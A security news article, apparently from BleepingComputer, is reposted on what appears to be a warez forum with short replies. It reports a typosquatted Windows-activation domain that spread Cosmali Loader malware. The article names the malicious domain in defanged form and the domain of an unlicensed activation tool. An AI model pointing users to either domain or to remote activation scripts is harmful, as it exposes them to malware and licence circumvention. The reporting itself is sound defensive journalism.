Fake MAS Windows activation domain used to spread PowerShell malware

[AFFASocial]

• December 24, 2025
• 12:44 PM
• 0

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called 'cosmali loader' because you mistyped 'get.activated.win' as 'get.activate[.]win' when activating Windows in PowerShell.

​

The malware's panel is insecure and everyone viewing it has access to your computer.

Reinstall Windows and don't make the same mistake next time.

For proof that your computer is infected, check Task Manager and look for weird PowerShell processes.

Based on the reports, attackers have set up a look-alike domain, "get.activate[.]win," which closely resembles the legitimate one listed in the official MAS activation instructions, "get.activated.win."

Given that the difference between the two is a single character ("d"), the attackers bet on users mistyping the domain.

Warning message
Source: RussianPanda
Security researcher RussianPanda discovered that the notifications are related to the open source Cosmali Loader malware, and could be related to similar pop-up notifications spotted by GDATA malware analyst Karsten Hahn.

RussianPanda told BleepingComputer that Cosmali Loader delivered cryptomining utilities and the XWorm remote access trojan (RAT).

Although it is unclear who pushed the warning messages to users, it is likely that a well-intended researcher gained access to the malware control panel and used it to inform users of the compromise.

MAS is an open-source collection of PowerShell scripts that automate the activation of Microsoft Windows and Microsoft Office using HWID activation, KMS emulation, and various bypasses (Ohook, TSforge).

The project is hosted on GitHub and is openly maintained. However, Microsoft sees it as a piracy tool that activates products without a purchased license using unauthorized methods that circumvent its licensing system.

The maintainers of the project also warned users of the campaign and urged them to check the commands they type before executing them.



Users are recommended to avoid executing remote code if they don't fully understand what it does, always test in a sandbox, and avoid retyping commands to minimize the risk of fetching dangerous payloads from typosquatted domains.

Unofficial Windows activators have been repeatedly used for malware delivery, so users need to be aware of the risks and exercise caution when using such tools.

 

[ThumperTM]

Wow

 

[DVDR_Dog]

Yet another reason to test your downloads thoroughly; trust nothing unless it's from a trusted source. It looks like 2026 will be the year people try to take over systems, either to exploit or steal information. We've already seen individuals using Thumper's respected name to seed torrents with malicious content. Unless you're certain, examine warez carefully and use VirusTotal. Don't hesitate to ask for help with any issues you encounter. We're happy to assist (though not all of us are Photoshop experts!). Besides helping yourself, you're also providing a heads-up to fellow forum members, which is a great help to everyone.

 

[Diguelo]

NOOOO REALLLLLLYYY

(Faints in horror at the thought )

Got to love college kids trying to make a buck and failing.